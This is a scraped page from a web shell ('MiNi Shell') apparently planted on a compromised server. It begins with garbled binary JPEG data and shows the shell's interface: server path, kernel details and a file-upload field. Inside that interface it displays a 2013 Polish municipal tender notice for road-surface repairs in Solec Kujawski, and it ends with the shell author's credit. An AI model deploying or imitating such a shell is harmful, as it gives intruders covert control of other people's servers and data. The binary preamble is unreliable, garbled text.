JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130125/36136-N-2013.html

<p class="kh_header"><b>Solec Kujawski: WYKONYWANIE REMONTÓW CZĄSTKOWYCH NAWIERZCHNI BITUMICZNYCH DRÓG NA TERENIE MIASTA I GMINY SOLEC KUJAWSKI
 W 2013 ROKU</b><br>
<b>Numer ogłoszenia: 36136 - 2013; data zamieszczenia: 25.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Solec Kujawski , ul. 23 Stycznia 7, 86-050 Solec Kujawski, woj. kujawsko-pomorskie, tel. 52 3871325, faks 52 3871253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.soleckujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONYWANIE REMONTÓW CZĄSTKOWYCH NAWIERZCHNI BITUMICZNYCH DRÓG NA TERENIE MIASTA I GMINY SOLEC KUJAWSKI
 W 2013 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje naprawę uszkodzeń nawierzchni (wybojów i obłamanych krawędzi, uszczelnienie pojedynczych pęknięć oraz wypełnienie ubytków na drogach gminnych:
 Mieszanką mineralno-asfaltową - do wykonania  remontu  cząstkowego  uszkodzeń o  głębokości do  4,  5, 6  i  powyżej 6 cm
Zastosowany materiał to:
 a/ asfalt drogowy wg PN-C-96170  	
 b/ wypełniacz podstawowy wg PN-S-96504                                                
 c/ kruszywo:
-	  grysy klasy I wg PN-B-11112
-	  piasek łamany wg PN-B-11112
-	  kruszywo drobne granulowane wg PN-B-11112
-	  nie sortowane kruszywo granulowane.
Zakres prac obejmuje:
-  wycięcie uszkodzonych miejsc z nadaniem regularnych kształtów,
-	  oczyszczenie uszkodzonych miejsc, usunięcie rumoszu z pryzmy,
-	  ogrzanie bitumu i skropienie lub posmarowanie nim dna oraz krawędzi i ścianek  naprawianego miejsca, rozłożenie mieszanki  / przy głębokościach do 5 cm w jednej warstwie/ ,   przy głębokości do 6 cm należy wykonać w dwóch warstwach,
-	przy głębokościach powyżej 6 cm należy w pierwszej kolejności  wyremontować klińcem 20/31,5 mm  lub 6,3/20 mm w ilości od 30-40 kg.m2 w zależności od głębokości wyboju.
Następnie ułożyć mieszankę mineralno-asfaltową na warstwę ścieralną, która winna wynosi 4 cm, nie więcej niż 6 cm,
   -  zagęszczenie mieszanki kruszywem,
    -  skropienie bitumem powierzchni górnej warstwy i zasypanie drobnym kruszywem.
Mieszankę można układać w temperaturze otoczenia powyżej 50C. Nie dopuszcza się układania mieszanki podczas opadów atmosferycznych.
 Masą  z recyklera  - do  wykonania remontu cząstkowego uszkodzonych warstw  ścieralnych  na gorąco przy głębokości 4, 5, 6 i powyżej 6 cm.
Zastosowany materiał to:
asfalt drogowy PN-C-96170- do produkcji przetworzonych mieszanek mineralno-asfaltowych,
środek odnawiający spełniający wymagania SST i posiadający atest producenta,
kruszywo spełniające wymagania zawarte w PN -B-11112, PN-B-11111, PN-B-11113,
d/ wypełniacz spełniający wymagania objęte PN-S-96504.
Zakres prac obejmuje:
-	   obcięcie krawędzi uszkodzonego miejsca,
-	   oczyszczenie uszkodzonego miejsca,
-	   skropienie bitumem dna i ścian bocznych,
-	 rozścielenie mieszanki mineralno-asfaltowej jedną warstwa - do 5cm, lub dwoma  warstwami - do 6 cm,
-	  przy głębokościach powyżej 6 cm należy w pierwszej kolejności  wyremontować klińcem 20/31,5 mm lub 6,3/20 mm w ilości od 30-40 kg/m2 w zależności od głębokości wyboju, następnie ułożyć    mieszankę na warstwę ścieralną, która winna wynosi 4 cm, nie więcej niż 6 cm w zależności od grubości nawierzchni,
-	  prawidłowego zagęszczenia poszczególnych warstw ułożonej mieszanki.
Skład mieszanki mineralno-asfaltowej stosowany na gorąco powinien być zgodny z wymaganiami określonymi w PN-S-96021.
Warstwę z przetworzonej mieszanki mineralno-asfaltowej należy układać przy suchej pogodzie w temperaturze nie niższej od 100C. Zabrania się układania mieszanek w czasie opadów atmosferycznych oraz silnego wiatru.
Grysem i emulsją asfaltową niemodyfikowaną -  do wykonania remontu uszkodzonego pokrowca bitumicznego o głębokości  3,  4,  5 cm
Zastosowane materiały:
emulsja asfaltowa K-1-65MP ,
grys bazaltowy frakcji 2-5, 5-8, 8-16 , wg  PN-B-11112.
Zakres czynności:
obcięcie krawędzi uszkodzonego pokrowca z nadaniem  regularnych kształtów,oczyszczenie uszkodzonego miejsca z odrzuceniem rumoszu na pryzmę z wywiezieniem,
skropienie bitumem oczyszczonego dna i ścianek krawędzi naprawianego miejsca,
rozścielenie kruszywa jedną lub dwoma warstwami w zależności od głębokości uszkodzenia,
 skropienie bitumem rozścielonego kruszywa,
 rozsypanie drobnego kruszywa,
zagęszczenie poszczególnych warstw kruszywa uprzednio rozścielonego w uszkodzonych miejscach.
W zależności od głębokości uszkodzeń rozróżnia się następujące rodzaje remontu cząstkowego:wyboje o głębokości do 3 cm:
miejsce uszkodzone należy oczyścić szczotkami stalowymi raz oskardować odstające   i wykruszające się części pokrowca nadając regularne kształty,
po oczyszczeniu uszkodzonego miejsca dno i krawędzie tego uszkodzenia należy  
lancą skraplarki spryskać emulsją w ilości 1,4 kg/m2,,
na spryskaną powierzchnię rozsypać grysami o uziarnieniu 8-16 mm w ilości 20-   
 25kg/m2  i odpowiednio zagęścić ubijakami ręcznymi lub płytą wibracyjną,
zagęszczoną warstwę należy spryskać emulsją jw. w ilości 3,0-3,5 kg/m2  i posypać  
grysem odpowiednio 2-8 mm w ilości 10-14 kg/m2. Rozsypane grysy  należy zagęścić  ubijakiem ręcznym lub płytą wibracyjną,
uporządkować teren po remoncie, wyboje o głębokości do 4 cm:
      a/  miejsce uszkodzone należy oczyścić szczotkami stalowymi oraz oskardować odstające i wykruszające się części pokrowca nadając regularne kształty,
po oczyszczeniu uszkodzonego miejsca dno i krawędzie tego uszkodzenia należy ,,lancą skraplarki spryskać emulsją w ilości 1,4 kg/m2,,
na spryskaną powierzchnię rozsypać grysami o uziarnieniu 8-16 mm w ilości 25-30
 kg/m2  i odpowiednio zagęścić ubijakami ręcznymi lub płytą wibracyjną,
 zagęszczoną warstwę należy spryskać emulsją jw. w ilości 3,5-4,0 kg/m2 i posypać  
 grysem odpowiednio 2-8 mm  i 2-5 mm w ilości 14-18 kg/m2 w stosunku 2:1., rozsypane  grysy należy zagęścić ubijakiem ręcznym lub płytą wibracyjną,
 uporządkować teren po remoncie.
wyboje o głębokości do 5 cm:
miejsce uszkodzone należy oczyścić szczotkami stalowymi oraz	oskardować odstające i wykruszające się części pokrowca nadając  regularne kształty,
 po oczyszczeniu uszkodzonego miejsca dno i krawędzie tego uszkodzeni należy, lancą skraplarki spryskać emulsją w ilości 1,4 kg/m2,,
c/  na spryskaną powierzchnię rozsypać grysami o uziarnieniu 8-16 mm w ilości 35-40kg/m2  i odpowiednio zagęścić ubijakami ręcznymi lub płytą wibracyjną,
zagęszczoną warstwę należy spryskać emulsją jw. w ilości 4,0-4,5 kg/m2 i 	posypać grysem odpowiednio 2-8 mm w ilości 20-25 kg/m2. Rozsypane grysy 	należy zagęścić  ubijakiem ręcznym lub płytą wibracyjną,uporządkować teren po remoncie.
 Grysem i emulsją asfaltową niemodyfikowaną wbudowanych pod ciśnieniem za pomocą remonterów drogowych -  do wykonania remontu   uszkodzonego pokrowca bitumicznego podłużnych pęknięć (szerszych od 2cm)oraz ubytków i wybojów  o głębokości do 1cm i powyżej, Urządzenia te nadają  ziarnom grysu (frakcji od 2 do 4mm, od 4 do 8mm )  o dużej prędkości przy ich wyrzucaniu z dyszy razem z emulsją.
 Przygotowanie uszkodzonego miejsca (ubytku, wyboju lub obłamanych krawędzi  nawierzchni) do naprawy należy wykonać bardzo starannie przez:
- usunięcie luźnych okruchów nawierzchni,
- usunięcie wody, doprowadzając uszkodzone miejsca do stanu powietrzno-suchego,
- dokładne oczyszczenie dna i krawędzi uszkodzonego miejsca z luźnych ziaren grysu,  żwiru, piasku i pyłu.
 Uzupełnienie ubytków:
- poprzez dyszę natryskiwana jest warstewka modyfikowanej emulsji asfaltowej,
- następnie przy użyciu tej samej dyszy natryskuje się pod ciśnieniem naprawiane miejsce  kruszywem otoczonym (w dyszy) emulsją, w końcowej fazie należy zastosować natrysk naprawianego miejsca kruszywem  frakcji   od 2- 4 mm,
bezpośrednio po tak wyremontowanym miejscu może odbywać się ruch samochodowy.  
Przed rozpoczęciem robót należy:
dokonać rozpoznania rodzaju i zakresu uszkodzeń,
 uzgodnić prawidłowy   sposób wykonania remontu cząstkowego,
przygotować odpowiednią  ilości materiałów i sprzętu technicznego,oznakować  prowadzone  roboty na drodze zgodnie z wymogami   bezpieczeństwa i  przepisami obowiązującymi w tym zakresie, w szczególnych  przypadkach opracować projekt organizacji ruchu na  czas wykonywania robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.
Ocena spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie dokumentów i oświadczeń wg. klauzuli spełnia -nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali  co najmniej cztery zadania o charakterze i wielkością porównywalną z przedmiotem zamówienia, w tym dwa - wykonane remonterem o powierzchni powyżej 3000 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000 złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, że wykonawca nie zalega z opłacaniem podatków i nie zalega z       opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub, że uzyskał      przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych      płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
Pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy niezbędnych zasobów do korzystania z nich przy wykonywaniu zamówienia (zgodnie z art. 26 ust. 2b ustawy Pzp) - w przypadku, gdy Wykonawca polega na: wiedzy i doświadczenia, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów.
Gdy ofertę podpisuje osoba, która nie jest wymieniona w dokumencie stwierdzającym uprawnienia do występowania w obrocie prawnym, do oferty musi być dołączone na piśmie stosowne pełnomocnictwo w tej sprawie podpisane przez osoby upoważnione do reprezentowania Wykonawcy, o ile nie wynika to z przedstawionych dokumentów rejestrowych; 
Oświadczenie o części zamówienia przewidzianej do wykonania przez podwykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.soleckujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. 23 Stycznia 7
86-050 Solec Kujawski
pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 12:15, miejsce: Urząd Miasta i Gminy
ul. 23 Stycznia 7
86-050 Solec Kujawski
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com